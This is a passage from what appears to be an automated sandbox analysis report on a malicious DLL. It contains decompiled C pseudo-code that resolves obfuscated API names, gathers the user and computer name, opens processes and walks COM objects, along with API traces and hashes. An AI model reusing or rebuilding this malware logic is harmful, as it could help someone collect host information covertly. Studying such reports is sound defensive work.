                                							_t36 = _t42;
                                						}
                                						_t43 = E0428A41C(_t36, _t33);
                                						if(_t43 != 0) {
                                							E04288B22(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E04288B22(_t28);
                                				}
                                				return _t36;
                                			}

                                APIs
                                  • Part of subcall function 0428A055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,04287BA7,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?), ref: 0428A0BC
                                  • Part of subcall function 0428A055: sprintf.NTDLL ref: 0428A0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?,04D795B0), ref: 04287BB8
                                • lstrlen.KERNEL32(?,?,?,04289DA0,?,04D795B0), ref: 04287BC0
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • strcpy.NTDLL ref: 04287BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 04287BE2
                                  • Part of subcall function 04281188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04287BF1,00000000,?,?,?,04289DA0,?,04D795B0), ref: 0428119F
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04289DA0,?,04D795B0), ref: 04287BFF
                                  • Part of subcall function 0428976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04287C0B,00000000,?,?,04289DA0,?,04D795B0), ref: 04289779
                                  • Part of subcall function 0428976F: _snprintf.NTDLL ref: 042897D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 985fffc7541cb3aa9b569fcd7020145b90742ad36c10c05a92dd4923789c7fcf
                                • Instruction ID: 57ac9a0dd37f0154d4c532acc275ecaf85b59b28e27bea089d5545decfe6c7cd
                                • Opcode Fuzzy Hash: 985fffc7541cb3aa9b569fcd7020145b90742ad36c10c05a92dd4923789c7fcf
                                • Instruction Fuzzy Hash: 0311C6737231257757127BB8AC48C6F76ADDED4A64315011DF504E7181DF38ED0247A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 042894A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 042894B8
                                • SysAllocString.OLEAUT32(00000000), ref: 042894CA
                                • SysFreeString.OLEAUT32(00000000), ref: 04289532
                                • SysFreeString.OLEAUT32(00000000), ref: 04289541
                                • SysFreeString.OLEAUT32(00000000), ref: 0428954C
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 6677d0134b5a590140c33625df41204688e0faba0ff4831a2d728edd06f78440
                                • Instruction ID: 464fb0e99c63ae54db476a58832ec1b478cee3f3502b54f0f8ffce2bfb7f7bd8
                                • Opcode Fuzzy Hash: 6677d0134b5a590140c33625df41204688e0faba0ff4831a2d728edd06f78440
                                • Instruction Fuzzy Hash: 7E41C131A11609AFDB01EFBCD8046AFBBB9EF48340F144029E900EB250DB75ED45CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04284944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E04281525(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x428d2a8; // 0xaea5a8
                                					_t1 = _t23 + 0x428e11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x428d2a8; // 0xaea5a8
                                					_t2 = _t26 + 0x428e769; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E04288B22(_t54);
                                					} else {
                                						_t30 =  *0x428d2a8; // 0xaea5a8
                                						_t5 = _t30 + 0x428e756; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x428d2a8; // 0xaea5a8
                                							_t7 = _t33 + 0x428e40b; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x428d2a8; // 0xaea5a8
                                								_t9 = _t36 + 0x428e4d2; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x428d2a8; // 0xaea5a8
                                									_t11 = _t39 + 0x428e779; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E04285CD1(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}

                                APIs
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,042834A1,?,00000001,?,?,00000000,00000000), ref: 04284969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0428498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 042849A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042849B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042849CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042849E3
                                  • Part of subcall function 04285CD1: memset.NTDLL ref: 04285D50
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 48e936e3aa4d5109794d106c94c8f4a95796cf7bef17d06762e31061b836e76d
                                • Instruction ID: 4e7476fca952dc8e1767defc9cbb2046276f71642a86593ea35d628c7c024cbd
                                • Opcode Fuzzy Hash: 48e936e3aa4d5109794d106c94c8f4a95796cf7bef17d06762e31061b836e76d
                                • Instruction Fuzzy Hash: E2211CB172260BAFE710FF69E854D5EB7ECEB04754701402DE905DB2A1EB74E9088B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E04284B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				intOrPtr _t64;
                                				char _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x428d33c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E04287B3B( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					if(E04288C52(_t92, _t97, _t101, _t91, _t59) != 0) {
                                						L27:
                                						E04288B22(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x428d278; // 0x4d79d18
                                					_t16 = _t64 + 0xc; // 0x4d79e3a
                                					_t65 = E04287B3B(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d0428c0
                                						if(E0428A38F(_t97,  *_t33, _t91, _a8,  *0x428d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                							_t68 =  *0x428d2a8; // 0xaea5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x428ea3f; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x428e8e7; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							if(E04288F85(_t69,  *0x428d334,  *0x428d338,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x428d2a8; // 0xaea5a8
                                									_t44 = _t71 + 0x428e846; // 0x74666f53
                                									_t73 = E04287B3B(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d0428c0
                                										E04284538( *_t47, _t91, _a8,  *0x428d338, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d0428c0
                                										E04284538( *_t49, _t91, _t99,  *0x428d330, _a16);
                                										E04288B22(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d0428c0
                                									E04284538( *_t40, _t91, _a8,  *0x428d338, _a24);
                                									_t43 = _t101 + 0x10; // 0x3d0428c0
                                									E04284538( *_t43, _t91, _a8,  *0x428d330, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E04288B22(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d0428c0
                                					_t81 = E04287DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d0428c0
                                							E0428A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E04288B22(_t100);
                                						_t98 = _a16;
                                					}
                                					E04288B22(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E0428A789(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x428d33c);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}

                                APIs
                                • StrChrA.SHLWAPI(04289900,0000005F,00000000,00000000,00000104), ref: 04284B5D
                                • lstrcpy.KERNEL32(?,?), ref: 04284B8A
                                  • Part of subcall function 04287B3B: lstrlen.KERNEL32(?,00000000,04D79D18,00000000,04285142,04D79F3B,?,?,?,?,?,69B25F44,00000005,0428D00C), ref: 04287B42
                                  • Part of subcall function 04287B3B: mbstowcs.NTDLL ref: 04287B6B
                                  • Part of subcall function 04287B3B: memset.NTDLL ref: 04287B7D
                                  • Part of subcall function 04284538: lstrlenW.KERNEL32(?,?,?,04284CF3,3D0428C0,80000002,04289900,04285C8D,74666F53,4D4C4B48,04285C8D,?,3D0428C0,80000002,04289900,?), ref: 0428455D
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 04284BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 750dd791ab3454cc6408e0b96529b41ef616099c49b713dfc462014f88be6712
                                • Instruction ID: 33e7c396f8487ea1e6891663da349f847e91e0bb4894249eb35f5ad6ec410951
                                • Opcode Fuzzy Hash: 750dd791ab3454cc6408e0b96529b41ef616099c49b713dfc462014f88be6712
                                • Instruction Fuzzy Hash: 40515A7132220ABFEF11BFA4EC44EAE7BB9EF44308F14851DF911961A0E739E9159B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E04289FF6() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0x428d32c; // 0x4d795b0
                                				__imp__( &(_t3[0x10]));
                                				while(1) {
                                					_t5 =  *0x428d32c; // 0x4d795b0
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t7 =  *0x428d32c; // 0x4d795b0
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x428e81a) {
                                					HeapFree( *0x428d238, 0, _t10);
                                					_t7 =  *0x428d32c; // 0x4d795b0
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8);
                                				return _t8;
                                			}

                                APIs
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04289FFF
                                • Sleep.KERNEL32(0000000A,?,042830F3), ref: 0428A009
                                • HeapFree.KERNEL32(00000000,?,?,042830F3), ref: 0428A037
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 0428A04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: c0a1b597f138bec403d8383cbb2fd61147afb6804fc228852a7a538d5788162c
                                • Instruction ID: a5d088b7bfc8e2ce4881b9ae99d851ce9833788815aed1ad6fecbc6ba6fe66ea
                                • Opcode Fuzzy Hash: c0a1b597f138bec403d8383cbb2fd61147afb6804fc228852a7a538d5788162c
                                • Instruction Fuzzy Hash: 11F0B2747231419BE718AB69E84DB2DB7E4EB08345B04801EE902DB3A0CB3CEC04DE20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04289267() {
                                				long _v8;
                                				long _v12;
                                				int _v16;
                                				long _t39;
                                				long _t43;
                                				signed int _t47;
                                				short _t51;
                                				signed int _t52;
                                				int _t56;
                                				int _t57;
                                				char* _t64;
                                				short* _t67;
                                
                                				_v16 = 0;
                                				_v8 = 0;
                                				GetUserNameW(0,  &_v8);
                                				_t39 = _v8;
                                				if(_t39 != 0) {
                                					_v12 = _t39;
                                					_v8 = 0;
                                					GetComputerNameW(0,  &_v8);
                                					_t43 = _v8;
                                					if(_t43 != 0) {
                                						_v12 = _v12 + _t43 + 2;
                                						_t64 = E04281525(_v12 + _t43 + 2 << 2);
                                						if(_t64 != 0) {
                                							_t47 = _v12;
                                							_t67 = _t64 + _t47 * 2;
                                							_v8 = _t47;
                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                								L7:
                                								E04288B22(_t64);
                                							} else {
                                								_t51 = 0x40;
                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                								_t52 = _v8;
                                								_v12 = _v12 - _t52;
                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                									goto L7;
                                								} else {
                                									_t56 = _v12 + _v8;
                                									_t31 = _t56 + 2; // 0x4289cb2
                                									_v12 = _t56;
                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                									_v8 = _t57;
                                									if(_t57 == 0) {
                                										goto L7;
                                									} else {
                                										_t64[_t57] = 0;
                                										_v16 = _t64;
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v16;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,04289CB0), ref: 0428927B
                                • GetComputerNameW.KERNEL32(00000000,04289CB0), ref: 04289297
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetUserNameW.ADVAPI32(00000000,04289CB0), ref: 042892D1
                                • GetComputerNameW.KERNEL32(04289CB0,?), ref: 042892F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04289CB0,00000000,04289CB2,00000000,00000000,?,?,04289CB0), ref: 04289317
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 74ebbfd9547da37913ca3b24d3379eb10aa3b00b027afcab505438bca9129657
                                • Instruction ID: b0e67de207529e272c389130dc5083a4b0f52749c5cefaba7631ccbb79219afb
                                • Opcode Fuzzy Hash: 74ebbfd9547da37913ca3b24d3379eb10aa3b00b027afcab505438bca9129657
                                • Instruction Fuzzy Hash: 47212BB2A11109FFDB10DFE9E9888EEBBB8EF44304B5044AEE501E7280D734AB45DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04289EBB(intOrPtr _a4) {
                                				void* _t2;
                                				unsigned int _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                				void* _t15;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0x428d26c = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 != 5) {
                                					L4:
                                					if(_t15 <= 0) {
                                						_t5 = 0x32;
                                						return _t5;
                                					}
                                					L5:
                                					 *0x428d25c = _t4;
                                					_t6 = GetCurrentProcessId();
                                					 *0x428d258 = _t6;
                                					 *0x428d264 = _a4;
                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                					 *0x428d254 = _t7;
                                					if(_t7 == 0) {
                                						 *0x428d254 =  *0x428d254 | 0xffffffff;
                                					}
                                					return 0;
                                				}
                                				if(_t4 >> 8 > 0) {
                                					goto L5;
                                				}
                                				_t15 = _t4 - _t4;
                                				goto L4;
                                			}

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,042827C3,?,?,00000001,?,?,?,04287F25,?), ref: 04289EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 04289ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 04289EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04287F25,?), ref: 04289F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 04289F2A
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 827501867525b23d131b20f72949731ce9db77723ca1df5d00f8b5fddc83465d
                                • Instruction ID: dc00b9ae77a103d1cd99b292a54bed1d05608f42771bde892e61cd0c07c0acf2
                                • Opcode Fuzzy Hash: 827501867525b23d131b20f72949731ce9db77723ca1df5d00f8b5fddc83465d
                                • Instruction Fuzzy Hash: A2F081B07733029BE714AFA9B81DB2D3B60E740741F10051EE542C61C6EBBCE885CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E04284E05(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				short _t67;
                                				intOrPtr* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t72;
                                				intOrPtr* _t75;
                                				intOrPtr* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t83;
                                				intOrPtr* _t87;
                                				intOrPtr _t103;
                                				intOrPtr _t109;
                                				void* _t118;
                                				void* _t122;
                                				void* _t123;
                                				intOrPtr _t130;
                                
                                				_t123 = _t122 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t118 >= 0) {
                                					_t54 = _v8;
                                					_t103 =  *0x428d2a8; // 0xaea5a8
                                					_t5 = _t103 + 0x428e038; // 0x3050f485
                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t118 >= 0) {
                                						__imp__#2(0x428c290);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t118 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t87 = __imp__#6;
                                							_t118 = _t61;
                                							if(_t118 >= 0) {
                                								_t63 = _v24;
                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t118 >= 0) {
                                									_t130 = _v20;
                                									if(_t130 != 0) {
                                										_t67 = 3;
                                										_v64 = _t67;
                                										_v48 = _t67;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t130 > 0) {
                                											while(1) {
                                												_t68 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t123 = _t123;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                												if(_t118 < 0) {
                                													goto L16;
                                												}
                                												_t70 = _v8;
                                												_t109 =  *0x428d2a8; // 0xaea5a8
                                												_t28 = _t109 + 0x428e0bc; // 0x3050f1ff
                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                												if(_t118 >= 0) {
                                													_t75 = _v16;
                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                													if(_t118 >= 0 && _v12 != 0) {
                                														_t79 =  *0x428d2a8; // 0xaea5a8
                                														_t33 = _t79 + 0x428e078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t83 = _v16;
                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                														}
                                														 *_t87(_v12);
                                													}
                                													_t77 = _v16;
                                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                												}
                                												_t72 = _v8;
                                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t87(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t118;
                                			}

                                APIs
                                • SysAllocString.OLEAUT32(0428C290), ref: 04284E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04284F36
                                • SysFreeString.OLEAUT32(00000000), ref: 04284F4F
                                • SysFreeString.OLEAUT32(?), ref: 04284F7E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 33807a3b82fbb8baedd1e5a485aac7c65487af38308dee1283dd8baf4c59627d
                                • Instruction ID: 2e46df5c4569b8d9bdb33efa1509539072e377de3ba3dd7b6459fbbb6d4d1374
                                • Opcode Fuzzy Hash: 33807a3b82fbb8baedd1e5a485aac7c65487af38308dee1283dd8baf4c59627d
                                • Instruction Fuzzy Hash: A4516F75E0150AEFCB00EFA8D488DAEB7B9EF88704B15458CE915EB251E771AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 042813B6
                                • SysFreeString.OLEAUT32(00000000), ref: 0428149B
                                  • Part of subcall function 04284E05: SysAllocString.OLEAUT32(0428C290), ref: 04284E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 042814EE
                                • SysFreeString.OLEAUT32(00000000), ref: 042814FD
                                  • Part of subcall function 042852B9: Sleep.KERNEL32(000001F4), ref: 04285301
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
